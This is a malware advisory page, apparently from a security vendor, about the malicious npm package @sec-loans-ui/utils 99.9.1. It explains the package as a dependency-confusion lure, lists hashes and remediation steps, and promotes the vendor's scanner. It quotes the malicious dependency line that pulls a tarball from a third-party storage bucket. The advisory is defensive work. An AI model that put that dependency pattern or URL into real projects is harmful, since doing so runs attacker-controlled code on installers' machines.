Which versions of @sec-loans-ui/utils are malicious?

The following npm versions of @sec-loans-ui/utils are flagged malicious: 99.9.1. Treat any of these as compromised.

How do I remediate @sec-loans-ui/utils if I installed it?

Remove @sec-loans-ui/utils from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.

I already installed @sec-loans-ui/utils — how do I know if it already compromised me?

If @sec-loans-ui/utils was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is @sec-loans-ui/utils part of a known attack campaign?

Yes — @sec-loans-ui/utils is associated with the IN-MAL-2026-003477, IN-MAL-2026-003476 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find @sec-loans-ui/utils across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for @sec-loans-ui/utils (version 99.9.1). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging @sec-loans-ui/utils across your stack and pipelines.

Malicious package

@sec-loans-ui/utilsnpm

Malicious code in @sec-loans-ui/utils (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4432

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall @sec-loans-ui/utils

What this malware does

Package is a hollow lure: index.js is a 35-byte stub (module.exports = {}), description and author are empty, and the version is bumped to 99.9.1 — the canonical version-race shape used to beat an internal @sec-loans-ui/utils package in resolution. The package's only on-install effect is its single dependency, declared as a direct HTTPS tarball URL: "ltidisafe": "https://ltidi.storage.googleapis.com/depenconf/ltidisafe-2.4.1.tgz". The host ltidi.storage.googleapis.com is an anonymous third-party Google Cloud Storage bucket, not an npm-registry package and not infrastructure under the @sec-loans-ui scope. The URL path literally contains the string depenconf. On npm install, npm fetches that tarball and runs whatever lifecycle scripts it contains; the bucket owner can rotate the bytes served at that URL at any time without any change to this manifest. Installer harm: any environment that resolves this package as their internal @sec-loans-ui/utils will execute attacker-controlled code from a mutable, opaque, non-publisher bucket.

Malicious versions

1 flagged

99.9.1

Indicators of compromise (SHA-256)

35902497455c6ee82337b42f0c5c610bf89b30985cf2b5b95266a85ed5867932

da55a9be9d9f90abe00e16200ea17aa78f58643e40d872d04276453dfd8a88f9

Detection & response playbook

Malicious package

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for @sec-loans-ui/utils (version 99.9.1). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging @sec-loans-ui/utils across your stack and pipelines.
If you installed it — respond
Remove @sec-loans-ui/utils from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.
Did it already run?
If @sec-loans-ui/utils was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks @sec-loans-ui/utils before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. @sec-loans-ui/utils on npm has been identified as a malicious package (version 99.9.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-003477IN-MAL-2026-003476

References

npmjs.com

Credits

Amazon Inspector · finder

Detect & block this

O3 blocks @sec-loans-ui/utils-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.

Malware detection Runtime egress monitoring